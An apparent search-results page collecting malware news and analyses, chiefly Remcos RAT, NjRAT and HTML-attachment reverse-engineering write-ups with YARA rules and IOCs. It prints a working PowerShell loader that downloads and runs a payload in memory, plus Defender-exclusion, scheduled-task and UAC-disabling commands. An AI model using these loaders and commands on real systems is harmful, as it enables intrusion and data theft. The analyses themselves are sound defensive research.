Search results for RAT attacks

The recently disclosed critical security flaw impacting Apache ActiveMQ is being actively exploited by threat actors to distribute a new Go-based botnet called GoTitan as well as a .NET program known as PrCtrl Rat that's capable of remotely commandeering the infected hosts. The attacks involve the exploitation of a remote code execution bug (CVE-2023-46604, CVSS score: 10.0) that has been

Botnet Spotted Go-based botnet PrCtrl Rat Spotted Exploiting

Malware Analysis of Remcos RAT: Exploitaion and Detection ExplainedExecutive SummarySHA256 hash:2e5c4d023167875977767da513d8889f1fc09fb18fdadfd95c66a6a890b5ca3fRemcos is a commercially available Remote Access Tool (RAT) marketed for legitimate use in surveillance and penetration testing. However, it has been leveraged in various unauthorized hacking initiatives. When deployed, Remcos establishes a backdoor, allowing comprehensive remote control over the affected system. The tool is a product of BreakingSecurity, a company specializing in cybersecurity solutions.Hackers are getting smarter by using tricks like hiding their code and adding fake code, which makes it harder for security experts to figure out how their attacks work. They're using things like image files and compression to disguise their activities.YARA signature rules are attached in Appendix A. Malware sample and hashes have been submitted to VirusTotal for further examination.High-Level Technical SummaryRemcos is an advanced remote access tool that breaks into computers using a series of hidden codes, starting with a malicious file which can be delivered from mail or dropper. It cleverly disguises its next steps within an image file, and then uses another DLL to make sure it stays on the computer even after it's restarted. Remcos can record keystrokes to steal passwords and other private information, which it logs into a file. It stays in contact with the hacker's server to send out this stolen information and to get new orders, allowing the hacker to keep a close watch and control over the infected computer.Malware CompositionThis composition of remcos consists of the following components:2e5c4d023167875977767da513d8889f1fc09fb18fdadfd95c66a6a890b5ca3fEmbedded_Remcos.exeIn a C# dropper, there's a sneaky way that malware developers are hiding bad code. They put this code inside the InitializeComponent() method. This method is normally used just for setting up how the app looks, like buttons and menus. But now, it's being used to hide something harmful. The tricky part is that this bad code looks just like regular setup code, so it's hard to spot. It's like hiding something bad inside something good, so people don't notice it.This makes it hard to find and fix the problem. It's a clever trick by hackers, and it shows how they can use parts of an app we usually trust to do sneaky things.It is extracting a byte array from a resource, possibly a file or other data embedded in the application and generating another byte array from a hard coded string.The code is setting up a user interface for a form and then performing an operation on a data resource (“SHP”) using a generated key.The _data before the encryption looks like this.The for loop processes the Data_ array in a complex way. It goes through each byte of Data_ and modifies it based on a calculation involving both Data_ and KeyGen.The calculation inside the loop involves bitwise XOR (^), addition, and modulo operations. It appears to be some form of data manipulation or encryption/decryption, where Data_ is being altered using the KeyGen byte array.First, a MethodBase object named methodBase is assigned the value kb. The MethodBase class in C# is part of the reflection namespace and is used to discover information about methods (like constructors and other methods) at runtime.Then, an array of objects named array is created and initialized with string values. This array includes this.VC, this.VR, and the literal string “Boilerplate”. VC and VR are private string fields of the class, initialized to “57775972” and “6C7978”, respectively. Therefore, the array contains these two strings along with “Boilerplate”.Finally, the Invoke method on methodBase is called, passing obj and array as arguments. This means the method represented by methodBase is being executed with obj as the target and the string array as the parameters.Before the inoke there was binary loaded successfully in modules.And if look closely it in kb.Fullname it is calling dr,hA.wP method in Ben dll.Ben DLLBy adding breakpoint after loading from module we catch the debugger.The code performs image processing, uses reflection to invoke a method, and dynamically loads an assembly from a byte array. This kind of operation is typical in applications that need to manipulate images, dynamically execute code, and potentially load plugins or modules at runtime.Sleep for 16secnew MemoryStream(array2): This creates a new MemoryStream object using array2 as its buffer. array2 is assumed to be a byte array (byte[]) that contains data compressed using the GZip algorithm. The MemoryStream is a stream based on a memory buffer, allowing for reading from and writing to memory.new GZipStream(…): This creates a new GZipStream object. The GZipStream class is used to compress and decompress data in the GZip data format. In this case, it's constructed with the previously created MemoryStream and the CompressionMode.Decompress. This indicates that the GZipStream should be used for decompression, i.e., to decompress the data contained in array2.It's part of a process involving dynamic loading and reflection. It reads and possibly processes data from a MemoryStream, uses that data to load an assembly or access its contents, and then retrieves a specific type from that assembly.Rd is designed to dynamically load a .NET assembly from a byte array, denoted as u0020. It employs a nested, infinite loop structure with a switch statement for control flow. Initially, it attempts to load the assembly using Assembly.Load(u0020). The code's flow is influenced by the result of global::dr.hA.EV(), a method call whose purpose is unclear. If EV() returns a non-null value, the method exits the loop prematurely via a go to statement. The method's coding style, characterized by unconventional variable naming and complex looping, suggests a potential for obfuscation, possibly to conceal the actual functionality or make reverse-engineering more challenging.ReactionDiffusionAfter loading assembly we get a new binary in modules with the name of ReactionDiffusion.Then it disposes the “memorystream” which means the work of the memory stream is done here. Probably it will now move on to the next binary.After that it also dispose the gzip stream which was used to get the binary.Now let's track where it would go next in ReactionDiffusion. If we investigate the object where it is pointing its type show us the destination namespace and class.Since there were no method calls from previous binary. So, we created break point at constructor at it hit exact on it.There was nothing useful in ReactionDiffusion there, maybe it was all decoy code. Let's see what next the Ben binary does, in case 8 it gets bitmap from resources.RS MethodThe RS method in C# is designed to retrieve a Bitmap image from resources using reflection and obfuscated code patterns. It starts by declaring a ResourceManager to access embedded resources, using a dynamically constructed resource name from the first-string parameter, u0020. This parameter, along with a similarly named second parameter, is used in a nested, infinite loop structure with a switch statement. Bitmap is obtained by the method global::dr.hA.rY, which likely extracts the image from the resources. The control flow includes checks with global::dr.hA.EV() and global::dr.hA.m3(), whose purposes are unclear, but they seem to influence the flow and decision-making within the method. The use of obfuscated names (like u0020) and complex control flow suggests an intent to mask the code's functionality or purpose.Loading the assembly from byte arrayIt defines a private static method named Rd that takes a byte array u0020 as its parameter.It initializes an integer variable num with the value 1.Inside an infinite loop (for (;;)), the code performs the following actions: a. It declares a variable num2 and assigns it the value of num. b. It enters another loop (for (;;)). c. Within the inner loop, there is a switch statement with two cases:Case 1:It attempts to load an assembly using Assembly.Load(u0020), where u0020 represents the byte array passed as a parameter to the method.If the assembly is successfully loaded, it sets num2 to 0.It then checks whether global::dr.hA.EV() is not null. If it's not null, the code proceeds to the Block_1 label.If global::dr.hA.EV() is null, it effectively exits the loop and returns the loaded assembly.Default case:If none of the cases match, it returns the assembly variable, which would have been assigned earlier in the code. d. The Block_1 label is used to indicate the point where the code should continue if global::dr.hA.EV() is not null. It doesn't contain any specific code logic in the provided snippet.TyroneIt looks like another binary is coming. Another DLL loaded in modules with the name Tyrone.Invoking AJBqklj3Jn from tyorne { YcMqTyPiynJnoycycL.MhMHeAYqAZ6AJWSu3o}This is more obfuscated than previous binaries.Checking for the presence of a named mutex, which may be used by malware for synchronization or coordination purposes. “wnmJOXavioKPdkNYG”It tried to open but since if there is no mutex it goes to exception. If it exists it will end itself in second line.Creating MutexIt creates a new Mutex object with the name “wnmJOXavioKPdkNYG”. Mutexes are synchronization primitives used to control access to shared resources among multiple threads or processes.This was all to get path of appdata and then append it with “EiHjExP.exe”.“C:UsersusernameAppDataRoamingEiHjExP.exe”Check if not there Copy it.Change Directory PermissionIt adds access control entries to the directorySecurity object using the MhMHeAYqAZ6AJWSu3o.PR6qMi9p2U method. These entries seem to define permissions for specific file system rights (e.g., Read, ReadAndExecute, Delete, Write, etc.) with different access control types (e.g., Allow, Deny). The permissions are set for various inheritance flags and propagation flags, which determine how permissions are inherited by child objects.It removes “currentuser” security to change file and write permission.As you can see the permission are denied nowRemcos is doing this because it makes it safe from being changed or deleted from disc.Then it gets a base64 encoded text fetched from modules of this tyrone binary with this code.I decode this string from https://www.base64decode.org/ and it turns out that it is xml.There is code for decoding also in the remcos.Then this function is called to play with Microsoft Security. This function decodes the text which was fetched from module.It then creates a new process, assign a new stratinfo with it and give file name “powershell” which it gets from the module. In arguments of process, it gives @”Add-MpPreference -ExclusionPath “”C:UsersshaddyAppDataRoamingEiHjExP.exe”””Set process's window hidden.Windows ExclusionIt will be added to the exclusion but keep in mind that I was running it from admin, if not performing analysis from admin it will be able to add since so far there was not privilege escalation performed.Path.GetTempFileName(); it will return a string that represents a unique temporary file name. This file name is generated using a combination of a temporary directory path and a unique identifier, making it highly unlikely to clash with other temporary files in the system.It gets the identity of current user, exe path to update the xml. In the breakpoint it is updating the xml and saving it in text variable.The clean xml code.PersistenceAfter that it is writing all xml in tmp file.It then loads the command of scheduling task from modules and sets startupinfo of process. Process is executed with window style hidden, Filename “schtask.exe” and with following arguments.@”/Create /TN “”UpdatesEiHjExP”” /XML “”C:UsersshaddyAppDataLocalTemptmp66E3.tmp”””This command appears to be creating a new scheduled task with the name “UpdatesEiHjExP” and configuring it using an XML file located at “C:UsersshaddyAppDataLocalTemptmp66E3.tmp.”It is triggering the exe after every system restarts.Then it deletes the tmp file.After that it loads new assembly “xF7siMsac” from its resource manager.It is injecting this final binary and executing it. Let's see its injection inside process hacker.Another binary which is extracted and DE obfuscated from resources.Remcos / 5thstageAfter saving the binary from u0020 it looks exactly like client agent built from the original remcos agent from hxxps://breakingsecurity.net/remcos/. The logo is also the same, but its signature was not present in any online threat intelligence.https://www.virustotal.com/gui/search/f55fc4f4e1bcbe957d20750f56cd98869c717c18c14c8b6d42698557b254ad51This final stage was developed in c++ language. And before analysis when we perform strings filter there was something linking to remcos, this pattern comes almost in every remcos rat.Now let's start the debugger to look more into it. We can see some more identifications.It starts with calling GetAddrInfoW API which is pointing to rungmotors20.ddns.net:60247.GetAddrInfoW is a Windows API function that is used for network operations. It's part of the Windows Sockets (Winsock) API and is typically called to resolve network addresses or to perform name resolution, converting a hostname like a domain or a URL into an IP address that can be used to establish network connections.If running from admin privileges, it creates a directory [C:\ProgramData\remcos] using CreateDirectoryW API.CreateDirectoryW is a function in the Windows API that is used to create a new directory. The W at the end of CreateDirectoryW indicates that this function uses wide characters (Unicode), as opposed to CreateDirectoryA, which uses ANSI characters.After creating Directory, it creates file with name logs.dat using CretaeFileW api.There are privileges check also it is handling both cases smoothly. It is just paths which it used separately.While executed from admin it uses [ C:\ProgramData\remcos folder]. It creates thread and that thread in loop performs these steps.If executed from normal permission, it uses [C:\Users\username\Local\VirtualStore\ProgramData\remcos\logs.dat]It sets its mark on the system in registry. It sets exepath, licence and time for thread.Patching TLSAll traffic was encrypted so we must check what is being sent. There was TLS check which was on in our client rate.Since we cannot see what it is sending to server, because of TLS flag is on. It will send all the traffic encrypted. After patching this, we can analyze the traffic.After finding the check I was able to turn off the TLS and see all the traffic clearly. It was sending the device identification after every few seconds to server.This was sample data that rat was sending.$ KRemoteHost||DESKTOP-002IHON/shaddy||US||Windows 10 Enterprise (64 bit)||||8588939264||4.9.2 Pro||C:ProgramDataremcoslogs.dat||C:UsersshaddyDesktop5thstage.exe||||5thstage.exe — PID: 3308 — Module: 5thstage.exe — Thread: Main Thread 6232 — x32dbg [Elevated]||1||47||48556593||1||rungmotors20.ddns.net||Rmc-ZT6SIL||0||C:UsersshaddyDesktop5thstage.exe||12th Gen Intel(R) Core(TM) i7–12700KF||Exe||||Clipboard and Process recordingInside the thread it was performing three major activities because the one who built it, he/she only want to record clipboards, records keylogging and setting some registries. It records all the clipboards data inside the same logs.dat file. Only it appends [Text copied to clipboard] at initial and [End of clipboard] at end.It also keeps recording the process which spawns, its architecture, its user access and all the keystrokes also.Rules & IOCsYara Rulesrule remcos_pro_4_9_2{meta:author = “Osama Ellahi”description = “Remcos RAT 4.9.2 pro version from breakpoint”strings:$string_match1 = “© by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED” ascii fullword$string_match2 = “tRemcos v” ascii fullword$string_match3 = “BreakingSecurity.net” ascii fullword$string_match4 = “4.9.2 Pro” ascii fullword$string_match6 = “[Text pasted from clipboard]” ascii fullword$string_match7 = “[End of clipboard]” ascii fullword$string_match8 = “[End of clipboard]” ascii fullword$string_match9 = “[Text copied to clipboard]” ascii fullword$string_match11 = “Offline Keylogger Started” ascii fullword$string_match12 = “Offline Keylogger Stopped” ascii fullword$string_match13 = “Online Keylogger Started” ascii fullword$string_match14 = “Online Keylogger Stopped” ascii fullword$string_match15 = “Remcos restarted by watchdog!” ascii fullword$string_match16 = “Watchdog module activated” ascii fullword$string_match17 = “Watchdog launch failed!” ascii fullword$string_match18 = “[Chrome StoredLogins not found]” ascii fullword$string_match19 = “[Chrome StoredLogins found, cleared!]” ascii fullword$string_match20 = “[Chrome Cookies not found]” ascii fullword$string_match21 = “[Chrome Cookies found, cleared!]” ascii fullword$string_match22 = “[Firefox StoredLogins not found]” ascii fullword$string_match23 = “[Firefox Cookies not found]” ascii fullword$string_match24 = “[Firefox cookies found, cleared!]” ascii fullword$string_match25 = “[Firefox StoredLogins Cleared!]” ascii fullword$string_match26 = [IE cookies not found] ascii fullword$string_match27 = [IE cookies cleared!] ascii fullword$string_match28 = [Cleared browsers logins and cookies.] ascii fullword$string_paths1 = “\AppData\Local\Google\Chrome\User Data\Default\Cookies” ascii fullword$string_paths2 = “\AppData\Roaming\Mozilla\Firefox\Profiles\” ascii fullword$string_paths3 = “Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders” ascii fullword$string_paths4 = “Software\Microsoft\Windows\CurrentVersion\Run\” ascii fullword$string_paths5 = = “\AppData\Local\Google\Chrome\User Data\Default\Login Data” ascii fullword$string_paths6 = “Software\Microsoft\EventSounds\Sounds” ascii fullword$string_paths7 = “System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm” ascii fullword$string_commands1 = “CreateObject(”WScript.Shell”).Run ”cmd /c ””” ascii fullword$string_commands2 = “CreateObject(”Scripting.FileSystemObject”).DeleteFile(Wscript.ScriptFullName)” ascii fullword$string_commands3 = “\AppData\Local\Google\Chrome\User Data\Default\Login Data” ascii fullword$string_commands4 = “/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f” ascii$string_url1 = “http://geoplugin.net/json.gp" ascii fullword$string_url2 = “rungmotors20.ddns.net” ascii fullwordcondition:uint16(0) == 0x5a4d and filesize < 600KB and filesize >200KBand(any of ($string_url*)or3 of ($string_paths*)or5 of ($string_match*))}Callback URLsURL: rungmotors20.ddns.net Port: 60247URL: hxxp://geoplugin.net/json.gp Port: 443IOC1stSHA256 —2e5c4d023167875977767da513d8889f1fc09fb18fdadfd95c66a6a890b5ca3f2ndMD5 —3125f77575829f3b710f5a15912dec20 *stage2.dllSHA256 —1cc58fba1d1b4c7e0b9d752ea7f03fa3c312ae2fc53796d5b3acea98e6ea3c0e *stage2.dll3rdSHA256 —d01f3dea3851602ba5a0586c60430d286adf6fcc7e17aab080601a66630606e5 *stage3.dllMD5 —579197d4f760148a9482d1ebde113259 *stage3.dll4thSHA256 —c5928572e371b0a5d3109d0a7431ca9e064216beb858f04dc8d0140ccaf44b84 *Tyrone.dllMD5 —dd76e11ff9b96efdcf3cd377126c8d96 *Tyrone.dll5thSHA256 —f55fc4f4e1bcbe957d20750f56cd98869c717c18c14c8b6d42698557b254ad51 *5thstage.malMD5 —dc05d4f2864dfafa9b91e8e0d79840e3 *5thstage.malReferenceshttps://www.joesandbox.com/analysis/1339230/0/htmlhttps://www.jaiminton.com/reverse-engineering/remcos#part-2-decompiling-binaryUnfolding Remcos RAT- 4.9.2 Pro was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

ascii fullword Detection Explained Explained Executive

CompTIA Pentest exam objectives official exam

A new variant of the Agent Tesla malware has been observed delivered via a lure file with the ZPAQ compression format to harvest data from several email clients and nearly 40 web browsers. "ZPAQ is a file compression format that offers a better compression ratio and journaling function compared to widely used formats like ZIP and RAR," G Data malware analyst Anna Lvova said in a Monday analysis.

Tesla Malware ZPAQ Compression

Experts warn of a surge in NetSupport RAT attacks against education, government, and business services sectors. The Carbon Black Managed Detection & Response team is warning of a surge in the number of new infections related to NetSupport RAT in the last few weeks. The most impacted sectors are education, government, and business services. NetSupport […]

RAT attacks

Unmasking NJRat: A Deep Dive into a Notorious Remote Access Trojan Part1NjRAT is a type of malware that allows a remote actor to gain control of an infected computer system. It is one of the most widely used types of malware on the Internet due to its easy accessibility, free tutorials available on clear web, and wide range of functionalities to evade detection tools.Note : the sample analyzed in this blog was first seen in the month of October of 2023. As of now the file is found to be malicious by multiple AV/EDR tools.Virustotal result + PE headers of the file being analyzed.By analyzing headers we see that this version of malware was compiled on Sep 2 2023. As its based on .Net we can statically reverse engineer and review the code of the binary/executable.Initial review of string output of the binary we see few interesting stuff like a registry path , domain , few commands , executable names and network rules.Floss output of the binaryInitialization :The malware first create a registry key value pair “{di:!}” under current user and we see implement a mutual exclusion object to hinder concurrent infections on a single device.Registry Key , Mutex initializationUpon reviwing statically defined variables we see few interesting things as highlighted below , we see a port ( 18801 ) where connection is initiated , registry name ( RG variable ) , Registry path (sf variable ) , VR version number , string in variable VN contains base64 encoded value of “HacKed”. The variable “Y” stores random character which is being used as separator while sending back the data to C&C server.Interesting static variablesReviewing the OK.RC function which was being passed to mutex which in turn calls a function OK.INS() which initialized persistence mechanisms.Persistence Initialization functionPersistence :Reviewing the INS function , first we see the malware trying to find the file “C:\Windows\Microsoft system.exe” and copy the malware to this path and deleting the current instance of the malware and starting the new process of malware as “Microsoft system.exe”.Further we see exclusion being added via netsh for the traffic from this malware file. Then we see file being added to both current user and local machine registries. We also see the malware is being copied to startup folder with name “118f5683ac8ec11fa5ebd063bb65cc3b.exe” for persistence. Any app / exe placed inside startup folder would be launched upon booting the OS.Registry and startup persistenceFurther we see the malware killing a process “Exsample.exe” if its running. based on the research , it indicates that this file is a old version of same malware. We also see that the file copied to windir is being hidden.Killing Exsample.exe and hiding the malwarefurther we see persistence via autorun , As highlighted below we see that the malware is again copied into ProgramFiles directory of each logical drives as “svchost.exe” and then creates a autorun.inf file to run them automatically. Further malware hides the created autorun file.persistence via autorunC&C communicationConnecting to the C&C server : reviewing the connect function we see that the malware is connecting the “0.tcp.eu.ngrck.io” host , on sucessful connection its sends below information. - Environment variables - machine name - user name - machine date - Details OS information - processor type - camera status - string “HacKed”Connect function.Further receiving the data from the threat actor , then that data is handled by creating a new thread.Threat actor data handling.There are multiple commands available in this RAT with in the OK.im however we will discuss only few in details which are interesting.Below are the list of few capabilities observed in this RAT :Can spawn new process.Can modifies the startup page setting for Internet Explorer using the Registry to start a page/link upon opening. this can be used for Downloading other malwares , redirecting to phishing links , Exploit vulnerablities , installing other backdoors or to lauch a DDOS attacks.Has capability to shutdown / restart / logoff the sessionCan spawn custom error messages.Can invoke the “speak” method on the speech synthesizer object to synthesize the specified text.Uses Kernel32 Beep method to create beeps of specified frequency. further we see a command named “Piano” which leverage this function to create a music.OpenCD / closeCD drive (this is the command which someone uses to troll their victims)Disabling / enabling keyboard and mouse inputs.Turning monitor on / off.Taking over mouse controlEnabling / Disabling CMD.Disabling/enabling built in registry tools, sytem restore functions and Task manager.Taking over cursor.Control music playing.Few of the commands observed that attacker can use.As this blog is already getting big we will discuss other functionalities, dynamic analysis and detection mechanisms for this malware strain in our next blog.Thank you for your time!Part1 static/code analysis of the RAT : NjRAT was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Notorious Remote

Big thank you to Cisco for sponsoring this video! (And for the FREE Ethical Hacking Training!) Commercial spyware use is on the rise, with actors leveraging these sophisticated tools to conduct surveillance operations against a growing number of targets. Cisco is deeply concerned by an increase in the rate of high-sophistication attacks on network infrastructure — that we have observed and have seen corroborated by numerous reports issued by various intelligence organizations — indicating state-sponsored actors are targeting routers and firewalls globally. // Martin's SOCIAL // Twitter / X: https://twitter.com/mlee_security LinkedIn: https://www.linkedin.com/in/martinlee/ // Mark's SOCIAL // Twitter / X: https://twitter.com/m_jacks76 LinkedIn: https://www.linkedin.com/in/mark-jackson-148a012/ // Kieron's SOCIAL // LinkedIn: https://www.linkedin.com/in/kieron-iveson-88625b1b1/ // YouTube VIDEOS // Is AI biggest security threat in 2023?: https://youtu.be/SyaP9GDNIug // Links MENTIONED // Free Ethical Hacking course: https://skillsforall.com/course/ethical-hacker?courseLang=en-US Talos Intellexa Predator: https://blog.talosintelligence.com/mercenary-intellexa-predator/ Talos Year in review: https://blog.talosintelligence.com/half-year-in-review-2023/ State-sponsored campaigns target global network infrastructure: https://blog.talosintelligence.com/state-sponsored-campaigns-target-global-network-infrastructure/ NSSC: https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/jaguar-tooth/NCSC-MAR-Jaguar-Tooth.pdf // David's SOCIAL // Discord: https://discord.com/invite/usKSyzb Twitter: https://www.twitter.com/davidbombal Instagram: https://www.instagram.com/davidbombal LinkedIn: https://www.linkedin.com/in/davidbombal Facebook: https://www.facebook.com/davidbombal.co TikTok: http://tiktok.com/@davidbombal YouTube: https://www.youtube.com/davidbombal // MY STUFF // https://www.amazon.com/shop/davidbombal // SPONSORS // Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com // MENU // 00:00 - Coming up 04:38 - Interview with Martin Lee // Mercenary software & Vulnerabilities in softwares 09:00 - How can non-tech savvy people stop hacks 12:57 - Ransomware + Mercenary software 15:52 - The sky is not falling // Know your Threat Profile 20:07 - Affordable and free courses 23:26 - Interview with Mark Jackson // Risks of end-of-life network devices 27:48 - SNMP vs NETCONF/RESTRCONF 29:44 - GRE Tunnels 31:09 - VPNs without Multi-Factor Authentication being targeted 32:43 - Tips to prevent getting hacked 38:06 - Security for home network devices 39:40 - Why is it happening now? 43:18 - Interview with Cisco Apprentice // Getting into Cicso at 18 45:04 - Advice for the youth 46:52 - The younger perspective 48:13 - Conclusion cisco talos cisco talos pegasus spyware hacking hacker malware Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel! Disclaimer: This video is for educational purposes only. #pegasus #iphone #android

Opening HTML Files : A gateway to MalwareOverviewThis blog post examines how the ability to run VBscript / Jscript from HTML files in windows environment is being abused.This post is focused on reverse engineering and understanding the techniques used in these attacks.User's receives a phishing email having a webpage as an attachment for normal eye it may appear harmless, but it would have code crafted for malicious activity.In this sample we see that the malware has a obfuscated VB script code. When executed, this code executes a second-stage PowerShell payload that downloads an image. This image is embedded with chunk of encoded base64 bytes which was found to be a malicious DLL file( fiber.dll ). To avoid detection this DLL is loaded directly into the memory, leaving no trace on disk. Finally, the DLL calls a method to reach out to another address to download a third-stage payload. At the time of writing this blog, the third-stage URL is down so no further analysis was possible. However, based on the indicators of compromise (IOCs) gathered, the third-stage payload is likely a Remote Access Trojan (RAT), such as AgentTesla or ZgRAT.note: The file reviewed in this article was last sampled five days ago and is highly malicious. While Windows Defender detects it by default and remove it, But i found that by making minor changes to the file itself is enough to evade defender.Static Review of the MalwareThe file hash has been sampled already and has found malicious by major AD/EDR agents, even windows defender catches this and removes the file from disk. However , by de-obfuscating the VB script in the application i was able to get pass by defender and uploading the same to VT only 3 were able to detect it as malicious.Modified copy of malware uploaded to Virustotal.Further reviewing the HTML file manually in text editor we see the obfuscated VB script. Analyzing it I noticed a function where a parameter “command” is being passed and at the end of function call we see a object is being created and then executed.Obfuscated VB scriptSuspicious FunctionFurther deobfuscating the VB code we found a obfuscated powershell. This command is being passed to powershell to execute this is a 2nd level of obfuscation.2nd obfuscation codeDecoding this powershell we see below script where a image is being downloaded from imageupload.io and extracting the embedded base64 string from the image ( the image is real its just that extra data is appended to the image) and loading the decoded base64 directly into memory.$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))Then i wrote a simple powershell script to download the image file and extract the base64 data, decode it and wrote it into a binary. Checking in PE headers we found out the name of the DLL to be Fiber.dll.download image has embedded base64 data in it.PE header information, where can see the name of the DLL.Note : even this DLL has been sampled and found to be highly malicious. Even defender detects and removes the file automatically for analysis i had added exclusion.Further reviewing we found that final URL which was reversed and passed as a parameter to a method named “VAI” which was loaded from the DLL is now down so i stopped my analysis here. However checking the URL i see that it has been flagged by many and found to be associated with AgentTesla RAT operations.URL associated with Malware AgentTeslaAt the time of writing this blog AgentTesla family of malware was the most reported malware on malware bazaar.DetectionAs discussed earlier this file has been sampled many times and could easily be detected by most of the AV/EDR's. However , to detect similar attack's I had installed a SIEM agent on the workstation and detonated the payload to observe, create detection rules.SIEM events.Based on these detection (observed in above images) we can create rule to monitor the processes spawned by mshta.exe and another rule to monitor for “executationpolicy bypass”. (if organization is ok then running powershell in constrained/No language mode is also a good practice. )Other than these events we do see network activity towards malicious sites. so here SIEM can be integrated with a threat intel tools such as Iboss / VT and create a rule to trigger if any suspicious activity is noticed.As the majority damage is being done by the DLL file which is loaded into memory so a advance AV/EDR can defend against this.Indicator of CompromiseURL's 1. hxxps[:]//imageupload[.]io/ib/ekWgHWjP3arvUq7_1698166097.jpg2. hxxp[:]//185[.]254.37.174/mohammeddroidupdatedfilebase64.txtHashes1. 441e124e41303cc070ee4103429dc277c6dca56f4fbf82cb18bf4df6e7db69082. c0264eec4e395c3bd9a5821e7273db8091659ce8c8b9fff8da0911461a6e35c7Thank you for your TIME :)Opening HTML Files : A gateway to Malware was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

DLL file Malware Overview

Fortinet is aware of a research article named TunnelCrack, published at Usenix [1], which describe the LocalNet and ServerIP attacks. These attacks aim to leak VPN client traffic outside of the protected VPN tunnel when clients connect via untrusted networks, such as rogue Wi-Fi access points.  The LocalNet attack allows an attacker to force the usage of local network access features of the VPN to access unencrypted traffic. The ServerIP attack allows an attacker to intercept traffic sent to a spoofed VPN gateway via DNS spoofing attacks. These attacks do not enable the attacker to decrypt the encrypted traffic but rather will try to redirect the traffic through attacker controlled channels before the traffic is encrypted by the VPN.

article named TunnelCrack VPN VPN vulnerabilities vulnerabilities Fortinet

Founded in 2017 to support startups in their IT strategy, in France and abroad, SysWings has extended its activities to the cloud and managed services. The team is made up of heterogeneous profiles, mixing employees and consultants, scaled according to your projects.

Description We've been hearing a lot about software supply chain attacks over the last two years, and with good reason. The cybersecurity ecosystem and industry at large have been inundated with warnings about this attack vector, with high-profile attacks leading to a stark increase in vendor solutions, and government regulations keep trying to catch up. Yet despite the popularity of AppSec-related incidents, our research has shown that most organizations do not have an incident response plan in place specifically for these attacks. Others that do have an IR playbook, often prepare to respond to infra-related attacks such as ransomware, rather than attacks based on application channels. Given the prevalence of these attacks, this presentation will focus on software supply chain incident response. It will include a quick response playbook, trends, and characteristics that make AppSec incident response deserving of its own plan. Speaker Omer Yaron, Snyk, Senior Security Engineer - Managed by the OWASP® Foundation https://owasp.org/

Omer Yaron Threats Deserve Yaron Description

Image by Tumisu on PixabayAs we plunge deeper into the era of digital interconnectivity, the safety of our geolocation data is gaining paramount importance. According to the FBI's Internet Crime Report for 2022, there were over 300,000 victims of phishing scams, and over 58,000 people had personal data breaches. Our locations, once thought of as personal, are now freely available to the digital world. Consequently, this brings about risks that we are only beginning to understand and address.The rise in geolocation hacking has made it critical for us to secure our geolocation data. In a world governed by digital interfaces, being aware of these threats and taking preventative measures is no longer optional; it's a necessity. This piece dives into the intricacies of geolocation security, its importance, and its implications in our hyper-connected world.The Landscape of Geolocation DataGeolocation data is a digital footprint, marking our presence within the digital sphere. It maps precise coordinates, providing crucial context to our online interactions. Businesses harness this data to tailor their services, enhancing our digital experience. However, this data's inherent value also attracts cyber threats, underscoring the need for improved security protocols.Sources of geolocation dataHere are a few sources of geolocation data:GPSGlobal Positioning System, also known as GPS, is a satellite-based navigation system offering geolocation and time information. It utilizes a constellation of 24 satellites, ensuring global coverage. By triangulating signals from multiple satellites, GPS can determine a receiver's precise location. This technology is pervasive, underpinning a myriad of applications from navigation to tracking services.Wi-FiWi-Fi is a technology for networking that allows devices to connect to the internet without physical wires. It uses radio technology to send and receive data between devices and a router, enabling internet access.Often used in homes, offices, and public spaces, Wi-Fi is integral to modern communication. Its omnipresence facilitates seamless online connectivity, fostering digital productivity and convenience. Despite its benefits, Wi-Fi can also unintentionally reveal a user's location, making it a significant source of geolocation data.Cell tower triangulationCell tower triangulation is a powerful technique used to determine a mobile phone's location. It operates by measuring the phone signal's distance from three nearby cell towers.The intersection of these measurements provides the phone's approximate location. Though not as precise as GPS, it is vital in areas with limited satellite coverage. This method contributes significantly to the pool of geolocation data.Applications of geolocation dataGeolocation data, once an abstract concept, has become an integral part of our digital existence. It paints a vivid picture of our physical presence within the digital world. In the following sections, we discuss the diverse ways in which geolocation data shapes our digital experience and the critical issues surrounding its security.Mapping and navigationMapping and navigation have revolutionized our world, transforming the way we explore and interact with our surroundings. They provide accurate, real-time location information, simplifying complex journeys. With technology's help, we can plan optimal routes, avoid traffic congestion, and reach destinations efficiently.Location-based servicesLocation-based services tap into geolocation data to deliver customized services based on a user's precise location. They enhance user experience in various domains, like retail, tourism, and social networking. Examples include personalized shopping recommendations, localized weather updates, and augmented reality games.Targeted advertisingTargeted advertising is a technique employed by marketers to reach audiences based on demographics, behaviors, and geographic location. By leveraging geolocation data, you can tailor these advertisements to fit the users' interests more accurately. They optimize marketing resources, increase engagement rates, and potentially lead to higher conversion rates. It's a powerful tool that can transform digital advertising strategies, enhancing their overall effectiveness.Vulnerabilities of geolocation dataDespite its myriad advantages, geolocation data is not without its pitfalls. 